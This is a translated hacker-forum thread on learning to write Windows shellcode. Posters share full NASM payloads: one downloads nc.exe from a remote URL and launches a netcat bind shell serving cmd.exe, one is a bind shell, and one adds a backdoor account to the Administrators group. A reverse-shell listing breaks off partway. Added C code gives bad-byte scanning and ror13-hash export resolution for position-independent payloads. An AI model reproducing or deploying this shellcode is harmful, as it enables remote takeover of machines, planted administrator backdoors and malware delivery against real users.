Author
Topic: Learning to write shellcode (Read 4,909 times)
vicecity
How odd. The screenshot link doesn't work, and neither does the source code one. Only the .exe? Couldn't it be a virus or a trojan? Oh, and another thing: "put the address in the browser", hahaha, what's with all the hahaha. I downloaded it, but I don't intend to run it.
Gospel
Hehehe, don't even trust your own shadow.....
Vicecity, I was able to download makeshell.zip, which contains the executable program, a C++ example and the whole Visual Basic project!!! I'll take a look at it when I have time....
I don't like downloading executables; you can get burned for behaving like a script kiddie, so you're right not to run the .exe just in case... download the source, and once you've checked what it does, compile it and you're done!!
...
By the way, imagine if the other day, when you asked me for the executable of the 0349 exploit, I had slipped you a virus or one of those shellcodes that rojodos has found around, which actually connect to a remote machine or return a reverse shell!!???? That would be my practical joke.... ¬_¬ Like I said, don't be a script kiddie....
Hey Jakin, when I have time I'll take a look at your program, and if it helps me understand the world of shellcodes now that I'm starting out, a thousand thanks!!!
Regards!!!!! Happy New Year to everyone!!!
mdada
The zip link doesn't work.
Gospel
·_· ????
The .zip link works for me!!! I choose "Save target as" and the Windows download manager downloads it perfectly, with no problems....
Rojodos
Well, I just want to say that I don't like these little programs at all; I prefer to write the shellcodes by hand.....
No disrespect to your work (it must have taken you some effort), but you HAVE to learn to write shellcodes, because it's more necessary than it seems....
I prefer the source of a trojan that doesn't compile to a generator of undetectable trojans...
I want to learn, not be a sheep... BAAAA
Regards
Jakin
Insert this asm code into the program:

BITS 32
ORG 0x0

LoadLibrary    equ 0x77E5D961   ; LoadLibraryA, hardcoded for a Spanish Windows XP
GetProcAddress equ 0x77E5B332   ; GetProcAddress, same build

; library <dll>,<function>: LoadLibraryA(dll) then GetProcAddress(h, function);
; leaves the function pointer in ecx, or jumps to exit (clobbers eax, ebx, ecx)
%macro library 2
    xor eax,eax
    lea eax,%1
    push eax
    mov ebx,LoadLibrary
    call ebx
    test eax,eax
    jz exit
    mov ecx,eax
    xor eax,eax
    lea eax,%2
    push eax
    push ecx
    mov ebx,GetProcAddress
    call ebx
    test eax,eax
    jz exit
    mov ecx,eax
%endmacro

    jmp datos
start:
    pop edi                     ; edi = address of 'res'; data is reached as [edi-res+label]

ino:                            ; InternetOpenA("downloaders", INTERNET_OPEN_TYPE_DIRECT, 0, 0, 0)
    library [edi-res+win],[edi-res+ioa]
    push dword 0
    push dword 0
    push dword 0
    push dword 1
    lea eax,[edi-res+dow]
    push eax
    mov ebx,ecx
    call ebx
    mov esi,eax                 ; esi = hInternet

inou:                           ; InternetOpenUrlA(hInternet, url, 0, 0, 0x40000000, 0)
    library [edi-res+win],[edi-res+iua]
    xor eax,eax
    push eax
    push dword 0x40000000
    push eax
    push eax
    lea eax,[edi-res+url]
    push eax
    push esi
    mov ebx,ecx
    call ebx
    mov esi,eax                 ; esi = URL handle

alloc:                          ; GlobalAlloc(GMEM_ZEROINIT, 99999)
    library [edi-res+ker],[edi-res+glo]
    push dword 99999
    push dword 0x40
    mov ebx,ecx
    call ebx
    mov [edi-res+buf],eax       ; keep the buffer pointer in our own data (the original used [ebp-0x20], which depends on the host's stack frame)

inrf:                           ; InternetReadFile(hUrl, buf, 99999, &bytes)
    library [edi-res+win],[edi-res+irf]
    lea eax,[edi-res+bytes]
    push eax
    push dword 99999
    push dword [edi-res+buf]
    push esi
    mov ebx,ecx
    call ebx

inch:                           ; InternetCloseHandle(hUrl)
    library [edi-res+win],[edi-res+ich]
    push esi
    mov ebx,ecx
    call ebx

lcreat:                         ; _lcreat("nc.exe", 4)
    library [edi-res+ker],[edi-res+lcr]
    push dword 4
    lea eax,[edi-res+fil]
    push eax
    mov ebx,ecx
    call ebx
    mov esi,eax                 ; esi = file handle

write:                          ; _lwrite(hFile, buf, bytes)
    library [edi-res+ker],[edi-res+lwr]
    mov eax,[edi-res+bytes]
    push eax
    push dword [edi-res+buf]
    push esi
    mov ebx,ecx
    call ebx

close:                          ; _lclose(hFile)
    library [edi-res+ker],[edi-res+lcl]
    push esi
    mov ebx,ecx
    call ebx

exec:                           ; WinExec("nc.exe -L -d -e cmd.exe -p 9995", SW_SHOW)
    library [edi-res+ker],[edi-res+exe]
    push dword 5
    lea eax,[edi-res+par]
    push eax
    mov ebx,ecx
    call ebx

exit:                           ; ExitProcess(0)
    library [edi-res+ker],[edi-res+exi]
    xor eax,eax
    push eax
    mov ebx,ecx
    call ebx

datos:
    call start
res   dd 0
buf   dd 0
bytes dd 0
url   db "http://www.gratisweb.com/garrochoman/nc.exe",0
fil   db "nc.exe",0
par   db "nc.exe -L -d -e cmd.exe -p 9995",0
dow   db "downloaders",0
ker   db "kernel32.dll",0
win   db "wininet.dll",0
lcr   db "_lcreat",0
lwr   db "_lwrite",0
lcl   db "_lclose",0
glo   db "GlobalAlloc",0
exe   db "WinExec",0
exi   db "ExitProcess",0
ioa   db "InternetOpenA",0
iua   db "InternetOpenUrlA",0
irf   db "InternetReadFile",0
ich   db "InternetCloseHandle",0
« Last edited: 5 January 2004, 14:39 by Jakin »
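An added check, not part of Jakin's post or of his makeshell program: the listing above is written for NASM, and assuming it is assembled to a flat binary (nasm -f bin), the next thing a practitioner wants to know is which bytes the blob contains. "push dword 0", "dd 0" and the NUL-terminated strings all produce 0x00 bytes, which a strcpy-style overflow would truncate on. The C below, written for this page, scans a byte blob for a chosen set of bad bytes and renders it as a C string literal ready to paste into an exploit. The sample blob is a few hand-encoded instructions in the style of the listing plus one NUL-terminated string, constructed for the demonstration rather than taken from the assembled shellcode.

```c
/* Added example: bad-byte scan and C-string rendering of a shellcode blob.
 * Not part of the original thread or of the makeshell program. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Constructed sample: instructions in the style of the listing, hand-encoded
 * (not the output of assembling the forum code). */
static const unsigned char sample[] = {
    0x31, 0xc0,                         /* xor eax,eax            */
    0x50,                               /* push eax               */
    0x68, 0x00, 0x00, 0x00, 0x40,       /* push dword 0x40000000  */
    0xbb, 0x61, 0xd9, 0xe5, 0x77,       /* mov ebx,0x77E5D961     */
    0xff, 0xd3,                         /* call ebx               */
    'n', 'c', '.', 'e', 'x', 'e', 0x00  /* db "nc.exe",0          */
};

/* Bytes that commonly break a string-copy based overflow: NUL, LF, CR. */
static const unsigned char bad_chars[] = { 0x00, 0x0a, 0x0d };

/* Offset of the first byte of blob that appears in bad[0..nbad), or -1. */
long first_bad_offset(const unsigned char *blob, size_t len,
                      const unsigned char *bad, size_t nbad)
{
    for (size_t i = 0; i < len; i++)
        if (memchr(bad, blob[i], nbad) != NULL)
            return (long)i;
    return -1;
}

/* Number of bytes of blob that appear in bad[0..nbad). */
size_t count_bad_bytes(const unsigned char *blob, size_t len,
                       const unsigned char *bad, size_t nbad)
{
    size_t hits = 0;
    for (size_t i = 0; i < len; i++)
        if (memchr(bad, blob[i], nbad) != NULL)
            hits++;
    return hits;
}

/* Render blob as C string literals ("\x31\xc0..."), 16 bytes per quoted line.
 * Returns a malloc'ed NUL-terminated string; the caller frees it. */
char *to_c_string(const unsigned char *blob, size_t len)
{
    size_t lines = (len + 15) / 16;            /* each line: quote + 16*4 chars + quote + newline */
    char *out = malloc(len * 4 + lines * 3 + 1);
    if (out == NULL)
        return NULL;
    char *p = out;
    for (size_t i = 0; i < len; i++) {
        if (i % 16 == 0)
            *p++ = '"';
        p += sprintf(p, "\\x%02x", blob[i]);
        if (i % 16 == 15 || i + 1 == len) {
            *p++ = '"';
            *p++ = '\n';
        }
    }
    *p = '\0';
    return out;
}

int main(void)
{
    size_t hits = count_bad_bytes(sample, sizeof sample, bad_chars, sizeof bad_chars);
    long first = first_bad_offset(sample, sizeof sample, bad_chars, sizeof bad_chars);
    printf("%zu bytes, %zu bad bytes, first bad byte at offset %ld\n",
           sizeof sample, hits, first);
    char *s = to_c_string(sample, sizeof sample);
    if (s != NULL) {
        fputs(s, stdout);
        free(s);
    }
    return hits != 0;   /* non-zero exit: this blob needs an encoder before use */
}
```

On the sample the scan reports four 0x00 bytes, three from the immediate of "push dword 0x40000000" and one from the string terminator; the real listings above contain many more, so they are meant for a generator or a protocol that tolerates NULs, not for a plain string overflow.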
4e,65,6f
A simple question... what does that do??
PS: it's to clear something up for me.
cokeing
Could someone explain to me what a "Shellcode" is? Because if I split it up:
Shell -> command interpreter; Code -> code
is it the code of a command interpreter? For example, the ASM code of BASH.
¿?? Regards, cokeing
Tetaidrocarnabidol
Some moron put my name in as the password and deleted the programs from the server; oh well, it was easy, no comment xDDDD. If anyone wants the program, send me an email at sande600@hotmail.com, whoever has it. I'm posting a bindshell, here it is xDDDD

BITS 32
ORG 0x0

LoadLibrary equ 0x77E5D961      ; LoadLibraryA, hardcoded for a Spanish Windows XP
GetProcessA equ 0x77E5B332      ; GetProcAddress, same build

; offside <dll>,<function>: LoadLibraryA(dll) then GetProcAddress(h, function);
; leaves the function pointer in ecx, or jumps to exit (clobbers eax, ebx, ecx)
%macro offside 2
    xor eax,eax
    lea eax,%1
    push eax
    mov ebx,LoadLibrary
    call ebx
    test eax,eax
    jz exit
    mov ecx,eax
    xor eax,eax
    lea eax,%2
    push eax
    push ecx
    mov ebx,GetProcessA
    call ebx
    test eax,eax
    jz exit
    mov ecx,eax
%endmacro

STRUC WSADATA
    .wVersion       resw 1
    .wHighVersion   resw 1
    .szDescription  resb 256+1
    .szSystemStatus resb 128+1
    .iMaxSockets    resw 1
    .iMaxUdpDg      resw 1
    .lpVendorInfo   resd 1
ENDSTRUC

STRUC sockaddr
    .sin_family resw 1
    .sin_port   resw 1          ; 16-bit field (the original declared it resd)
    .sin_addr   resd 1
    .sin_zero   resb 8
ENDSTRUC

STRUC PROCESS_INFORMATION
    .hProcess    resd 1
    .hThread     resd 1
    .dwProcessID resd 1
    .dwThreadID  resd 1
ENDSTRUC

STRUC STARTUPINFO
    .cb              resd 1
    .lpReserved      resd 1
    .lpDesktop       resd 1
    .lpTitle         resd 1
    .dwX             resd 1
    .dwY             resd 1
    .dwXSize         resd 1
    .dwYSize         resd 1
    .dwXCountChars   resd 1
    .dwYCountChars   resd 1
    .dwFillAttribute resd 1
    .dwFlags         resd 1
    .wShowWindow     resw 1
    .cbReserved2     resw 1
    .lpReserved2     resd 1
    .hStdInput       resd 1
    .hStdOutput      resd 1
    .hStdError       resd 1
ENDSTRUC

STRUC SECURITY_ATTRIBUTES
    .nLength              resd 1
    .lpSecurityDescriptor resd 1
    .bInheritHandle       resd 1
ENDSTRUC

    jmp datos
start:
    pop edi                     ; edi = address of 'res'; data is reached as [edi-res+label]

startup:                        ; WSAStartup(0x101, &wsadata)
    sub esp, WSADATA_size
    and esp, 0x0FFFFFFFC
    mov esi,esp
    offside [edi-res+lib],[edi-res+wsa]
    push esi
    push dword 0x101
    mov ebx,ecx
    call ebx

Alloc:                          ; GlobalAlloc(GMEM_ZEROINIT, 99999): the I/O buffer
    offside [edi-res+ker],[edi-res+all]
    push dword 99999
    push dword 0x40
    mov ebx,ecx
    call ebx
    mov [edi-res+byt],eax

sock:                           ; socket(AF_INET, SOCK_STREAM, 0)
    offside [edi-res+lib],[edi-res+wss]
    xor eax,eax
    push eax
    inc eax
    push eax
    inc eax
    push eax
    mov ebx,ecx
    call ebx
    cmp eax,-1                  ; INVALID_SOCKET (the original's "cmp eax,1 / jb" never caught it)
    jz exit
    mov esi,eax                 ; esi = listening socket

blind:                          ; bind(s, &{AF_INET, htons(25550), INADDR_ANY}, 16)
    offside [edi-res+lib],[edi-res+bin]
    push dword 0
    push dword 0
    push dword 0
    push dword 0xCE630002       ; bytes 02 00 63 CE: sin_family=2, sin_port=0x63CE=25550
    mov ebx,esp
    push byte 16
    push ebx
    push esi
    mov ebx,ecx
    call ebx
    cmp eax,-1
    jz exit

listen:                         ; listen(s, 1)
    offside [edi-res+lib],[edi-res+lis]
    push byte 1
    push esi
    mov ebx,ecx
    call ebx
    cmp eax,-1
    jz exit

createpipe1:                    ; CreatePipe(&srd, &srw, &sa, 0): cmd.exe's stdout/stderr
    offside [edi-res+ker],[edi-res+crp]
    sub esp, SECURITY_ATTRIBUTES_size
    and esp, 0x0FFFFFFFC
    mov dword [esp],12          ; sa.nLength
    mov dword [esp+4],0         ; sa.lpSecurityDescriptor
    mov dword [esp+8],1         ; sa.bInheritHandle = TRUE
    mov edx,esp
    push dword 0
    push edx
    lea eax,[edi-res+srw]
    push eax
    lea eax,[edi-res+srd]
    push eax
    mov ebx,ecx
    call ebx
    cmp eax,0
    jz exit

createpipe2:                    ; CreatePipe(&rrd, &rrw, &sa, 0): cmd.exe's stdin
    offside [edi-res+ker],[edi-res+crp]
    sub esp, SECURITY_ATTRIBUTES_size
    and esp, 0x0FFFFFFFC
    mov dword [esp],12
    mov dword [esp+4],0
    mov dword [esp+8],1
    mov edx,esp
    push dword 0
    push edx
    lea eax,[edi-res+rrw]
    push eax
    lea eax,[edi-res+rrd]
    push eax
    mov ebx,ecx
    call ebx
    cmp eax,0
    jz exit

getinfo:                        ; GetStartupInfoA(&si)
    offside [edi-res+ker],[edi-res+get]
    sub esp, STARTUPINFO_size   ; reserve si on the stack (the original derived it from edx, below esp,
    and esp, 0x0FFFFFFFC        ; where the pushes that follow could overwrite it)
    mov edx,esp
    push edx
    mov ebx,ecx
    call ebx

createpro:                      ; CreateProcessA(0, "cmd.exe", &sa, &sa, TRUE, NORMAL_PRIORITY_CLASS, 0, 0, &si, &pi)
    offside [edi-res+ker],[edi-res+cre]
    mov edx,esp                 ; si is still at the top of the stack (edx is not preserved across the calls in offside)
    mov dword [edx],68          ; si.cb
    mov eax,[edi-res+srw]
    mov [edx+64],eax            ; si.hStdError
    mov [edx+60],eax            ; si.hStdOutput
    mov eax,[edi-res+rrd]
    mov dword [edx+56],eax      ; si.hStdInput
    mov dword [edx+44],0x101    ; si.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW
    mov word [edx+48],0         ; si.wShowWindow = SW_HIDE
    sub esp,PROCESS_INFORMATION_size
    and esp, 0x0FFFFFFFC
    mov ebx,esp                 ; ebx = &pi
    sub esp, SECURITY_ATTRIBUTES_size
    and esp, 0x0FFFFFFFC
    mov dword [esp],12
    mov dword [esp+4],0
    mov dword [esp+8],1
    mov eax,esp                 ; eax = &sa
    push ebx
    push edx
    push dword 0
    push dword 0
    push dword 0x20
    push dword 1
    push dword eax
    push dword eax
    lea eax,[edi-res+cmd]
    push eax
    push dword 0
    mov ebx,ecx
    call ebx
    cmp eax,0
    jz exit

CloseHandle1:                   ; CloseHandle(srw): the child has its own copies
    offside [edi-res+ker],[edi-res+clh]
    push dword [edi-res+srw]
    mov ebx,ecx
    call ebx
closehandle2:                   ; CloseHandle(rrd)
    offside [edi-res+ker],[edi-res+clh]
    push dword [edi-res+rrd]
    mov ebx,ecx
    call ebx

apcept:                         ; accept(s, 0, 0)
    offside [edi-res+lib],[edi-res+apc]
    push dword 0
    push dword 0
    push esi
    mov ebx,ecx
    call ebx
    cmp eax,-1                  ; INVALID_SOCKET
    jz exit
    mov esi,eax                 ; esi = connected socket

mandar:                         ; PeekNamedPipe(srd, 0, 1024, &bys, 0, 0): does cmd.exe have output?
    offside [edi-res+ker],[edi-res+pip]
    xor eax,eax
    push eax
    push eax
    lea eax,[edi-res+bys]
    push eax
    push dword 1024
    push dword 0
    push dword [edi-res+srd]
    mov ebx,ecx
    call ebx
    cmp eax,0
    jz recibir
    cmp dword [edi-res+bys],0
    jz recibir
    offside [edi-res+ker],[edi-res+red]   ; ReadFile(srd, byt, bys, &bys, 0)
    push dword 0
    lea eax,[edi-res+bys]       ; lpNumberOfBytesRead is a pointer (the original pushed the value)
    push eax
    push dword [edi-res+bys]
    push dword [edi-res+byt]
    push dword [edi-res+srd]
    mov ebx,ecx
    call ebx
    cmp eax,0
    jz recibir
    offside [edi-res+lib],[edi-res+sen]   ; send(sock, byt, bys, 0)
    push dword 0
    push dword [edi-res+bys]
    push dword [edi-res+byt]
    push esi
    mov ebx,ecx
    call ebx
    cmp eax,-1
    jz recibir
    offside [edi-res+ker],[edi-res+sle]   ; Sleep(100)
    push dword 100
    mov ebx,ecx
    call ebx
    jmp mandar

recibir:                        ; recv(sock, byt, 1024, 0)
    offside [edi-res+lib],[edi-res+rev]
    push dword 0
    push dword 1024
    push dword [edi-res+byt]
    push esi
    mov ebx,ecx
    call ebx
    cmp eax,-1
    jz exit
    cmp eax,0
    jz exit
    mov [edi-res+bys],eax       ; bytes received, kept in memory (edx would not survive the calls in offside)
    offside [edi-res+ker],[edi-res+wri]   ; WriteFile(rrw, byt, bys, &bys, 0)
    push dword 0
    lea eax,[edi-res+bys]
    push eax
    push dword [edi-res+bys]
    push dword [edi-res+byt]
    push dword [edi-res+rrw]
    mov ebx,ecx
    call ebx
    cmp eax,0
    jz exit
    offside [edi-res+ker],[edi-res+sle]   ; Sleep(100)
    push dword 100
    mov ebx,ecx
    call ebx
    jmp mandar

;msgbox:                        ; debugging MessageBoxA, left commented out
;    offside [edi-res+use],[edi-res+mgb]
;    xor eax,eax
;    inc eax
;    push eax
;    lea eax,[edi-res+men]
;    push eax
;    push eax
;    push dword 0
;    mov ebx,ecx
;    call ebx

exit:                           ; WSACleanup(); closesocket(esi); ExitProcess(0)
    offside [edi-res+lib],[edi-res+wsc]
    mov ebx,ecx
    call ebx
    offside [edi-res+lib],[edi-res+clo]
    push esi
    mov ebx,ecx
    call ebx
    offside [edi-res+ker],[edi-res+exi]
    xor eax,eax
    push eax
    mov ebx,ecx
    call ebx

datos:
    call start
res dd 0
cmd db "cmd.exe",0
lib db "WS2_32.DLL",0
ker db "kernel32.dll",0
lis db "listen",0
sle db "Sleep",0
apc db "accept",0
clo db "closesocket",0
bin db "bind",0
wss db "socket",0
wsa db "WSAStartup",0
wsc db "WSACleanup",0
exi db "ExitProcess",0
cre db "CreateProcessA",0
crp db "CreatePipe",0
clh db "CloseHandle",0
get db "GetStartupInfoA",0
all db "GlobalAlloc",0
pip db "PeekNamedPipe",0
red db "ReadFile",0
wri db "WriteFile",0
sen db "send",0
rev db "recv",0
srd dd 0
srw dd 0
rrd dd 0
rrw dd 0
bys dd 0
byt dd 0
;use db "user32.dll",0
;mgb db "MessageBoxA",0
;men db "correcto",0

Regards
« Last edited: 4 February 2004, 17:09 by Tetaidrocarnabidol »
byebye
You forgot to say which Windows it's for.
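The remark above is the practical weakness of every listing in this thread: LoadLibraryA and GetProcAddress are hardcoded as 0x77E5D961 and 0x77E5B332, which are only right for one kernel32 build (a Spanish XP, as the comments say). Position-independent shellcode avoids that by finding kernel32 in memory and reading the addresses out of its export table itself. The C below is an added example written for this page, not code from the thread: it walks a mapped 32-bit PE image the way GetProcAddress does (DOS header, NT headers, export directory, then the name, ordinal and function tables) and resolves an export either by name or by a ror13 hash of the name, the scheme many position-independent Windows payloads use so the API strings need not appear in the payload. The image it parses is a small constructed one with four exports, not a real kernel32; locating kernel32's base through the PEB is the other half of the job and is not shown. Little-endian values are decoded byte by byte, so the code runs on any host.

```c
/* Added example: export-table lookup in a mapped PE32 image, by name or ror13
 * hash, over a constructed image.  Not code from the thread. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define IMG_LEN 0x400   /* size of the constructed image */

static uint16_t rd16(const uint8_t *p, uint32_t o) { return (uint16_t)(p[o] | p[o + 1] << 8); }
static uint32_t rd32(const uint8_t *p, uint32_t o) { return rd16(p, o) | (uint32_t)rd16(p, o + 2) << 16; }
static void wr16(uint8_t *p, uint32_t o, uint16_t v) { p[o] = v & 0xff; p[o + 1] = v >> 8; }
static void wr32(uint8_t *p, uint32_t o, uint32_t v) { wr16(p, o, v & 0xffff); wr16(p, o + 2, v >> 16); }

/* ror13 hash of an export name, terminating NUL included: h = ror(h,13) + byte. */
uint32_t ror13_hash(const char *name)
{
    uint32_t h = 0;
    const unsigned char *p = (const unsigned char *)name;
    do { h = (h >> 13) | (h << 19); h += *p; } while (*p++);
    return h;
}

/* Resolve an export's RVA from a mapped PE32 image of 'len' bytes.  Matches by
 * 'name' when non-NULL, otherwise by ror13 hash.  Every offset taken from the
 * image is bounds-checked; returns 0 when not found or the image is malformed. */
uint32_t pe_resolve(const uint8_t *img, size_t len, const char *name, uint32_t hash)
{
#define IN(off, n) ((uint64_t)(off) + (uint64_t)(n) <= (uint64_t)len)
    if (!IN(0x40, 0) || img[0] != 'M' || img[1] != 'Z') return 0;
    uint32_t nt = rd32(img, 0x3c);                                  /* e_lfanew */
    if (!IN(nt, 128) || rd32(img, nt) != 0x00004550u) return 0;     /* "PE\0\0" */
    if (rd16(img, nt + 24) != 0x10b) return 0;                      /* optional header magic: PE32 */
    uint32_t exp = rd32(img, nt + 24 + 96);                         /* DataDirectory[0] = exports */
    if (exp == 0 || !IN(exp, 40)) return 0;
    uint32_t nfunc = rd32(img, exp + 20), nnames = rd32(img, exp + 24);
    uint32_t funcs = rd32(img, exp + 28), names = rd32(img, exp + 32), ords = rd32(img, exp + 36);
    if (!IN(funcs, 4ull * nfunc) || !IN(names, 4ull * nnames) || !IN(ords, 2ull * nnames)) return 0;
    for (uint32_t i = 0; i < nnames; i++) {
        uint32_t nrva = rd32(img, names + 4 * i);
        if (!IN(nrva, 1)) return 0;
        const char *s = (const char *)img + nrva;
        size_t n = 0;
        while (nrva + n < len && s[n]) n++;
        if (nrva + n >= len) return 0;                              /* unterminated name */
        int match = name ? strcmp(s, name) == 0 : ror13_hash(s) == hash;
        if (!match) continue;
        uint16_t ord = rd16(img, ords + 2 * i);                     /* names[i] -> ordinals[i] -> functions[ord] */
        return ord < nfunc ? rd32(img, funcs + 4 * ord) : 0;
    }
    return 0;
#undef IN
}

/* Constructed image: four exports whose name-table order differs from the
 * function-table order, so the ordinal indirection is exercised. */
static const char *const fake_names[4] = { "ExitProcess", "GetProcAddress", "LoadLibraryA", "WinExec" };
static const uint16_t fake_ords[4]  = { 3, 1, 0, 2 };
static const uint32_t fake_funcs[4] = { 0x1000, 0x1100, 0x1200, 0x1300 };

const uint8_t *fake_image(void)
{
    static uint8_t img[IMG_LEN];
    static int built;
    if (built) return img;
    memset(img, 0, sizeof img);
    img[0] = 'M'; img[1] = 'Z';
    wr32(img, 0x3c, 0x80);                 /* e_lfanew: NT headers at 0x80 */
    wr32(img, 0x80, 0x00004550u);          /* "PE\0\0" */
    wr16(img, 0x80 + 24, 0x10b);           /* PE32 */
    wr32(img, 0x80 + 24 + 96, 0x200);      /* export directory RVA */
    wr32(img, 0x80 + 24 + 100, 40);        /* export directory size */
    wr32(img, 0x200 + 20, 4);              /* NumberOfFunctions */
    wr32(img, 0x200 + 24, 4);              /* NumberOfNames */
    wr32(img, 0x200 + 28, 0x240);          /* AddressOfFunctions */
    wr32(img, 0x200 + 32, 0x260);          /* AddressOfNames */
    wr32(img, 0x200 + 36, 0x280);          /* AddressOfNameOrdinals */
    for (uint32_t i = 0, str = 0x300; i < 4; i++) {
        wr32(img, 0x240 + 4 * i, fake_funcs[i]);
        wr32(img, 0x260 + 4 * i, str);
        wr16(img, 0x280 + 2 * i, fake_ords[i]);
        strcpy((char *)img + str, fake_names[i]);
        str += (uint32_t)strlen(fake_names[i]) + 1;
    }
    built = 1;
    return img;
}

int main(void)
{
    const char *want[] = { "LoadLibraryA", "GetProcAddress", "ExitProcess", "WinExec", "nosuch" };
    for (int i = 0; i < 5; i++)
        printf("%-15s by name 0x%04x, by ror13 hash 0x%08x -> 0x%04x\n", want[i],
               pe_resolve(fake_image(), IMG_LEN, want[i], 0), ror13_hash(want[i]),
               pe_resolve(fake_image(), IMG_LEN, NULL, ror13_hash(want[i])));
    return 0;
}
```

Against a real module the image base plus the returned RVA is the address the listings hardcode; the bounds checks matter less inside a payload, but they are what keeps this parser safe to point at untrusted files.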
Marcelino
Here is code that adds a user as an administrator; you just have to put it in the program and bam, there's your shellcode.

[BITS 32]
ORG 0x0

LoadLibrary equ 0x77E5D961      ; LoadLibraryA, for a Spanish Windows XP
GetProcessA equ 0x77E5B332      ; GetProcAddress, same build

; OffSide <dll>,<function>: LoadLibraryA(dll) then GetProcAddress(h, function);
; leaves the function pointer in ecx, or jumps to exit (clobbers eax, ebx, ecx)
%macro OffSide 2
    xor eax,eax
    lea eax,%1
    push eax
    mov ebx,LoadLibrary
    call ebx
    test eax,eax
    jz exit
    mov ecx,eax
    xor eax,eax
    lea eax,%2
    push eax
    push ecx
    mov ebx,GetProcessA
    call ebx
    test eax,eax
    jz exit
    mov ecx,eax
%endmacro

STRUC USER_INFO_1
    .usri1_name         resd 1
    .usri1_password     resd 1
    .usri1_password_age resd 1
    .usri1_priv         resd 1
    .usri1_home_dir     resd 1
    .usri1_comment      resd 1
    .usri1_flags        resd 1
    .usri1_script_path  resd 1
ENDSTRUC

STRUC LOCALGROUP_MEMBERS_INFO_3
    .lgrmi3_domainandname resd 1
ENDSTRUC

    jmp datos
start:
    pop edi                     ; edi = address of 'res'; data is reached as [edi-res+label]

netuseradd:                     ; NetUserAdd(0, 1, &ui, 0)
    OffSide [edi-res+net],[edi-res+neu]
    push dword 0                ; L"ErcUn" built on the stack in UTF-16LE: user and password are both ErcUn
    push dword 0x0000006E
    push dword 0x00550063
    push dword 0x00720045
    mov esi, esp                ; esi = L"ErcUn"
    push dword 0x005c0000       ; a "\" just in front of it, so esi-2 = L"\ErcUn"
    sub esp, USER_INFO_1_size
    and esp, 0x0FFFFFFFC
    mov dword [esp],esi         ; usri1_name
    mov dword [esp+4],esi       ; usri1_password
    mov dword [esp+8],0         ; usri1_password_age
    mov dword [esp+12],1        ; usri1_priv = USER_PRIV_USER
    mov dword [esp+16],0        ; usri1_home_dir
    mov dword [esp+20],0        ; usri1_comment
    mov dword [esp+24],0x201    ; usri1_flags = UF_SCRIPT | UF_NORMAL_ACCOUNT
    mov dword [esp+28],0        ; usri1_script_path
    mov ebx, esp
    push dword 0                ; parm_err
    push ebx                    ; buf
    push dword 1                ; level
    push dword 0                ; servername: local machine
    mov ebx,ecx
    call ebx

NetLocalGroupAddMembers:        ; NetLocalGroupAddMembers(0, L"Administradores", 3, &mi, 1)
    OffSide [edi-res+net],[edi-res+nel]
    push dword 0                ; L"Administradores" (the Spanish name of the Administrators group) built on the stack
    push dword 0x00000073
    push dword 0x00650072
    push dword 0x006F0064
    push dword 0x00610072
    push dword 0x00740073
    push dword 0x0069006E
    push dword 0x0069006D
    push dword 0x00640041
    mov edx,esp                 ; edx = group name
    mov ebx, esi                ; esi survived the stdcall above (the original reloaded it from [ebp+0x20], which depends on the host's frame)
    sub ebx,2                   ; ebx = L"\ErcUn"
    sub esp, LOCALGROUP_MEMBERS_INFO_3_size
    and esp, 0x0FFFFFFFC
    mov dword [esp],ebx         ; lgrmi3_domainandname
    mov ebx,esp
    push dword 1                ; totalentries
    push ebx                    ; buf
    push dword 3                ; level
    push dword edx              ; groupname
    push dword 0                ; servername
    mov ebx,ecx
    call ebx

;msgbox:                        ; debugging MessageBoxA, left commented out
;    OffSide [edi-res+use],[edi-res+mgb]
;    xor eax,eax
;    inc eax
;    push eax
;    lea eax,[edi-res+men]
;    push eax
;    push eax
;    push dword 0
;    mov ebx,ecx
;    call ebx

exit:                           ; ExitProcess(0)
    OffSide [edi-res+ker],[edi-res+exi]
    xor eax,eax
    push eax
    mov ebx,ecx
    call ebx

datos:
    call start
res dd 0
ker db "kernel32.dll",0
net db "netapi32.dll",0
exi db "ExitProcess",0
neu db "NetUserAdd",0
nel db "NetLocalGroupAddMembers",0
;use db "user32.dll",0
;mgb db "MessageBoxA",0
;men db "Correcto",0

I hope you enjoy it at least as much as I enjoyed programming it.
vicecity
I haven't tried it, but I have a doubt: it adds a user with administrator power, but do you need to be logged in as Administrator, or can it be an ordinary user without many privileges?
Jhon Wey
Here's a reverse shell; put it in the program and there's your shellcode. I'm also posting a program that converts an IP to hexadecimal and back; just copy the result and paste it into the asm code. XDDDD I don't know, something has to be said. XDDD First the little program; these are the Visual Basic sources. http://www.iespana.es/garrochoman3/iphex.zip and the code:

BITS 32
ORG 0x0

LoadLibrary equ 0x77E5D961      ; LoadLibraryA, hardcoded for a Spanish Windows XP
GetProcessA equ 0x77E5B332      ; GetProcAddress, same build

; OffSide <dll>,<function>: LoadLibraryA(dll) then GetProcAddress(h, function);
; leaves the function pointer in ecx, or jumps to exit (clobbers eax, ebx, ecx)
%macro OffSide 2
    xor eax,eax
    lea eax,%1
    push eax
    mov ebx,LoadLibrary
    call ebx
    test eax,eax
    jz exit
    mov ecx,eax
    xor eax,eax
    lea eax,%2
    push eax
    push ecx
    mov ebx,GetProcessA
    call ebx
    test eax,eax
    jz exit
    mov ecx,eax
%endmacro

STRUC WSADATA
    .wVersion       resw 1
    .wHighVersion   resw 1
    .szDescription  resb 256+1
    .szSystemStatus resb 128+1
    .iMaxSockets    resw 1
    .iMaxUdpDg      resw 1
    .lpVendorInfo   resd 1
ENDSTRUC

STRUC sockaddr
    .sin_family resw 1
    .sin_port   resw 1          ; 16-bit field (the original declared it resd)
    .sin_addr   resd 1
    .sin_zero   resb 8
ENDSTRUC

STRUC PROCESS_INFORMATION
    .hProcess    resd 1
    .hThread     resd 1
    .dwProcessID resd 1
    .dwThreadID  resd 1
ENDSTRUC

STRUC STARTUPINFO
    .cb              resd 1
    .lpReserved      resd 1
    .lpDesktop       resd 1
    .lpTitle         resd 1
    .dwX             resd 1
    .dwY             resd 1
    .dwXSize         resd 1
    .dwYSize         resd 1
    .dwXCountChars   resd 1
    .dwYCountChars   resd 1
    .dwFillAttribute resd 1
    .dwFlags         resd 1
    .wShowWindow     resw 1
    .cbReserved2     resw 1
    .lpReserved2     resd 1
    .hStdInput       resd 1
    .hStdOutput      resd 1
    .hStdError       resd 1
ENDSTRUC

STRUC SECURITY_ATTRIBUTES
    .nLength              resd 1
    .lpSecurityDescriptor resd 1
    .bInheritHandle       resd 1
ENDSTRUC

    jmp datos
start:
